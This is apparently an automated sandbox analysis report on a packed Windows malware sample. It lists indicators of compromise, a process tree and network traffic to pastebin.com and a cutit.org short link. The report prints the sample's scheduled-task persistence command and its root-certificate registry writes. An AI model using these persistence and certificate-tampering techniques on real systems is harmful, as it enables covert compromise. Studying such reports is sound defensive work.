4a51d475a21dd8cc4d62d8b665b13dcf95c18ca9830f528092236fc8303b3cfa | Triage

Analysis

max time kernel
124s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2023, 07:35 UTC

Sharing

Report Analysis Logs

General

Target

79f8a6855bff25672d8de0eb51b794ca.exe
Size

1.5MB
MD5

79f8a6855bff25672d8de0eb51b794ca
SHA1

833dd25b7df608612b1e92979076c8f92e40fe84
SHA256

4a51d475a21dd8cc4d62d8b665b13dcf95c18ca9830f528092236fc8303b3cfa
SHA512

ced9d2a7fb781325ae970af597c0bc7a0d951e7ce8d035b2bf9b7f83b5c3ec67a2a8243dd2d66d5fabd908c66bf3b3efc88be312d4ca9dbd69f09edeecdf63a5
SSDEEP

24576:JsG0fR6HHfS/cG6cplv/cjukL2ZEN2TinYbR+FNvXU7cjukL2Y:JsHfR6HHfST6Qlv/cakLiIwinYb4FBUy

Score

7^/10

upx

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
4820	79f8a6855bff25672d8de0eb51b794ca.exe

Executes dropped EXE 1 IoCs

pid	Process
4820	79f8a6855bff25672d8de0eb51b794ca.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

resource	yara_rule
behavioral2/memory/1208-0-0x0000000000400000-0x000000000065C000-memory.dmp	upx
behavioral2/files/0x000c000000023153-12.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Program crash 18 IoCs

pid	pid_target	Process	procid_target
3772	4820	WerFault.exe	90
1836	4820	WerFault.exe	90
2580	4820	WerFault.exe	90
4908	4820	WerFault.exe	90
4276	4820	WerFault.exe	90
3668	4820	WerFault.exe	90
556	4820	WerFault.exe	90
516	4820	WerFault.exe	90
4316	4820	WerFault.exe	90
4756	4820	WerFault.exe	90
4720	4820	WerFault.exe	90
3572	4820	WerFault.exe	90
2920	4820	WerFault.exe	90
4468	4820	WerFault.exe	90
1388	4820	WerFault.exe	90
4524	4820	WerFault.exe	90
2688	4820	WerFault.exe	90
668	4820	WerFault.exe	90

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

pid	Process
1336	schtasks.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	79f8a6855bff25672d8de0eb51b794ca.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	79f8a6855bff25672d8de0eb51b794ca.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	79f8a6855bff25672d8de0eb51b794ca.exe
Key created	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\A053375BFE84E8B748782C7CEE15827A6AF5A405	79f8a6855bff25672d8de0eb51b794ca.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\A053375BFE84E8B748782C7CEE15827A6AF5A405\Blob = 030000000100000014000000a053375bfe84e8b748782c7cee15827a6af5a405140000000100000014000000142eb317b75856cbae500940e61faf9d8b14c2c6040000000100000010000000e829e65d7c4307d6fbc13c179e037a360f0000000100000020000000444ebd67bb83f8807b3921e938ac9178b882bd50aadb11231f044cf5f08df7ce190000000100000010000000f044424c506513d62804c04f719403f95c0000000100000004000000000800001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000001a05000030820516308202fea003020102021100912b084acf0c18a753f6d62e25a75f5a300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a3032310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310b300906035504031302523330820122300d06092a864886f70d01010105000382010f003082010a0282010100bb021528ccf6a094d30f12ec8d5592c3f882f199a67a4288a75d26aab52bb9c54cb1af8e6bf975c8a3d70f4794145535578c9ea8a23919f5823c42a94e6ef53bc32edb8dc0b05cf35938e7edcf69f05a0b1bbec094242587fa3771b313e71cace19befdbe43b45524596a9c153ce34c852eeb5aeed8fde6070e2a554abb66d0e97a540346b2bd3bc66eb66347cfa6b8b8f572999f830175dba726ffb81c5add286583d17c7e709bbf12bf786dcc1da715dd446e3ccad25c188bc60677566b3f118f7a25ce653ff3a88b647a5ff1318ea9809773f9d53f9cf01e5f5a6701714af63a4ff99b3939ddc53a706fe48851da169ae2575bb13cc5203f5ed51a18bdb150203010001a382010830820104300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414142eb317b75856cbae500940e61faf9d8b14c2c6301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b0500038202010085ca4e473ea3f7854485bcd56778b29863ad754d1e963d336572542d81a0eac3edf820bf5fccb77000b76e3bf65e94dee4209fa6ef8bb203e7a2b5163c91ceb4ed3902e77c258a47e6656e3f46f4d9f0ce942bee54ce12bc8c274bb8c1982fa2afcd71914a08b7c8b8237b042d08f908573e83d904330a472178098227c32ac89bb9ce5cf264c8c0be79c04f8e6d440c5e92bb2ef78b10e1e81d4429db5920ed63b921f81226949357a01d6504c10a22ae100d4397a1181f7ee0e08637b55ab1bd30bf876e2b2aff214e1b05c3f51897f05eacc3a5b86af02ebc3b33b9ee4bdeccfce4af840b863fc0554336f668e136176a8e99d1ffa540a734b7c0d063393539756ef2ba76c89302e9a94b6c17ce0c02d9bd81fb9fb768d40665b3823d7753f88e7903ad0a3107752a43d8559772c4290ef7c45d4ec8ae468430d7f2855f18a179bbe75e708b07e18693c3b98fdc6171252aafdfed255052688b92dce5d6b5e3da7dd0876c842131ae82f5fbb9abc889173de14ce5380ef6bd2bbd968114ebd5db3d20a77e59d3e2f858f95bb848cdfe5c4f1629fe1e5523afc811b08dea7c9390172ffdaca20947463ff0e9b0b7ff284d6832d6675e1e69a393b8f59d8b2f0bd25243a66f3257654d3281df3853855d7e5d6629eab8dde495b5cdb5561242cdc44ec6253844506decce005518fee94964d44eca979cb45bc073a8abb847c2	79f8a6855bff25672d8de0eb51b794ca.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1208	79f8a6855bff25672d8de0eb51b794ca.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1208	79f8a6855bff25672d8de0eb51b794ca.exe
4820	79f8a6855bff25672d8de0eb51b794ca.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 4820	1208	79f8a6855bff25672d8de0eb51b794ca.exe	90
PID 1208 wrote to memory of 4820	1208	79f8a6855bff25672d8de0eb51b794ca.exe	90
PID 1208 wrote to memory of 4820	1208	79f8a6855bff25672d8de0eb51b794ca.exe	90
PID 4820 wrote to memory of 1336	4820	79f8a6855bff25672d8de0eb51b794ca.exe	92
PID 4820 wrote to memory of 1336	4820	79f8a6855bff25672d8de0eb51b794ca.exe	92
PID 4820 wrote to memory of 1336	4820	79f8a6855bff25672d8de0eb51b794ca.exe	92
PID 4820 wrote to memory of 1732	4820	79f8a6855bff25672d8de0eb51b794ca.exe	100
PID 4820 wrote to memory of 1732	4820	79f8a6855bff25672d8de0eb51b794ca.exe	100
PID 4820 wrote to memory of 1732	4820	79f8a6855bff25672d8de0eb51b794ca.exe	100
PID 1732 wrote to memory of 1576	1732	cmd.exe	97
PID 1732 wrote to memory of 1576	1732	cmd.exe	97
PID 1732 wrote to memory of 1576	1732	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\79f8a6855bff25672d8de0eb51b794ca.exe
"C:\Users\Admin\AppData\Local\Temp\79f8a6855bff25672d8de0eb51b794ca.exe"
1⤵
- Suspicious behavior: RenamesItself
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Users\Admin\AppData\Local\Temp\79f8a6855bff25672d8de0eb51b794ca.exe
  C:\Users\Admin\AppData\Local\Temp\79f8a6855bff25672d8de0eb51b794ca.exe
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of UnmapMainImage
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /CREATE /RL HIGHEST /SC ONLOGON /TR "C:\Users\Admin\AppData\Local\Temp\79f8a6855bff25672d8de0eb51b794ca.exe" /TN nMQUF5AE494a /F
    3⤵
    - Creates scheduled task(s)
    PID:1336
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 608
    3⤵
    - Program crash
    PID:3772
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c schtasks.exe /Query /XML /TN nMQUF5AE494a > C:\Users\Admin\AppData\Local\Temp\cVgg8tb.xml
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 648
    3⤵
    - Program crash
    PID:1836
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 656
    3⤵
    - Program crash
    PID:2580
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 716
    3⤵
    - Program crash
    PID:4908
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 756
    3⤵
    - Program crash
    PID:4276
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 652
    3⤵
    - Program crash
    PID:3668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1484
    3⤵
    - Program crash
    PID:556
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1920
    3⤵
    - Program crash
    PID:516
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 2144
    3⤵
    - Program crash
    PID:4316
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1920
    3⤵
    - Program crash
    PID:4756
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 2000
    3⤵
    - Program crash
    PID:4720
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1932
    3⤵
    - Program crash
    PID:3572
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1912
    3⤵
    - Program crash
    PID:2920
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1944
    3⤵
    - Program crash
    PID:4468
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1972
    3⤵
    - Program crash
    PID:1388
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1944
    3⤵
    - Program crash
    PID:4524
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 2172
    3⤵
    - Program crash
    PID:2688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 620
    3⤵
    - Program crash
    PID:668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4820 -ip 4820
1⤵
PID:4988

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Query /XML /TN nMQUF5AE494a
1⤵
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4820 -ip 4820
1⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4820 -ip 4820
1⤵
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4820 -ip 4820
1⤵
PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4820 -ip 4820
1⤵
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4820 -ip 4820
1⤵
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4820 -ip 4820
1⤵
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4820 -ip 4820
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4820 -ip 4820
1⤵
PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4820 -ip 4820
1⤵
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4820 -ip 4820
1⤵
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4820 -ip 4820
1⤵
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4820 -ip 4820
1⤵
PID:2464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4820 -ip 4820
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4820 -ip 4820
1⤵
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4820 -ip 4820
1⤵
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4820 -ip 4820
1⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4820 -ip 4820
1⤵
PID:3172

Network

DNS

5.181.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.181.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

187.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.178.17.96.in-addr.arpa

IN PTR

Response

187.178.17.96.in-addr.arpa

IN PTR

a96-17-178-187deploystaticakamaitechnologiescom
DNS

pastebin.com

79f8a6855bff25672d8de0eb51b794ca.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143

pastebin.com

IN A

172.67.34.170
DNS

cutit.org

79f8a6855bff25672d8de0eb51b794ca.exe

Remote address:

8.8.8.8:53

Request

cutit.org

IN A

Response

cutit.org

IN A

64.91.240.248
GET

https://cutit.org/oxgBR

79f8a6855bff25672d8de0eb51b794ca.exe

Remote address:

64.91.240.248:443

Request

GET /oxgBR HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: cutit.org
Cache-Control: no-cache

Response

HTTP/1.1 302 Moved Temporarily

Date: Fri, 22 Dec 2023 10:03:03 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww7.cutit.org/oxgBR?usid=25&utid=4365959183
Content-Length: 0
Content-Type: text/html; charset=UTF-8
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

143.68.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.68.20.104.in-addr.arpa

IN PTR

Response
DNS

248.240.91.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

248.240.91.64.in-addr.arpa

IN PTR

Response

248.240.91.64.in-addr.arpa

IN PTR

crocodile parklogiccom
DNS

32.169.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

32.169.19.2.in-addr.arpa

IN PTR

Response

32.169.19.2.in-addr.arpa

IN PTR

a2-19-169-32deploystaticakamaitechnologiescom
DNS

ww7.cutit.org

79f8a6855bff25672d8de0eb51b794ca.exe

Remote address:

8.8.8.8:53

Request

ww7.cutit.org

IN A

Response

ww7.cutit.org

IN CNAME

78626.bodis.com

78626.bodis.com

IN A

199.59.243.225
GET

http://ww7.cutit.org/oxgBR?usid=25&utid=4365959183

79f8a6855bff25672d8de0eb51b794ca.exe

Remote address:

199.59.243.225:80

Request

GET /oxgBR?usid=25&utid=4365959183 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: ww7.cutit.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

date: Fri, 22 Dec 2023 10:03:03 GMT
content-type: text/html; charset=utf-8
content-length: 1097
x-request-id: 2baa1c1d-8479-40ca-bcdf-f4e2cc05cf9b
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NRI1aSpMgQqu2RkviwqMhbNJ1LYw3lpBddhi6dWjyxvcSsSMIzCYoPPJhV/OzzznLSmM0VdcgkXW6wADp5/Sfw==
set-cookie: parking_session=2baa1c1d-8479-40ca-bcdf-f4e2cc05cf9b; expires=Fri, 22 Dec 2023 10:18:04 GMT; path=/
DNS

201.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.179.17.96.in-addr.arpa

IN PTR

Response

201.179.17.96.in-addr.arpa

IN PTR

a96-17-179-201deploystaticakamaitechnologiescom
DNS

225.243.59.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.243.59.199.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR

Response

18.134.221.88.in-addr.arpa

IN PTR

a88-221-134-18deploystaticakamaitechnologiescom
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom

104.20.68.143:443

pastebin.com

79f8a6855bff25672d8de0eb51b794ca.exe

190 B
92 B
4
2
64.91.240.248:443

https://cutit.org/oxgBR

tls, http

79f8a6855bff25672d8de0eb51b794ca.exe

1.2kB
3.9kB
15
10

HTTP Request

GET https://cutit.org/oxgBR

HTTP Response

302
199.59.243.225:80

http://ww7.cutit.org/oxgBR?usid=25&utid=4365959183

http

79f8a6855bff25672d8de0eb51b794ca.exe

849 B
2.6kB
14
6

HTTP Request

GET http://ww7.cutit.org/oxgBR?usid=25&utid=4365959183

HTTP Response

200

8.8.8.8:53

5.181.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

5.181.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

187.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

187.178.17.96.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

79f8a6855bff25672d8de0eb51b794ca.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.68.143

104.20.67.143

172.67.34.170
8.8.8.8:53

cutit.org

dns

79f8a6855bff25672d8de0eb51b794ca.exe

55 B
71 B
1
1

DNS Request

cutit.org

DNS Response

64.91.240.248
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

143.68.20.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

143.68.20.104.in-addr.arpa
8.8.8.8:53

248.240.91.64.in-addr.arpa

dns

72 B
109 B
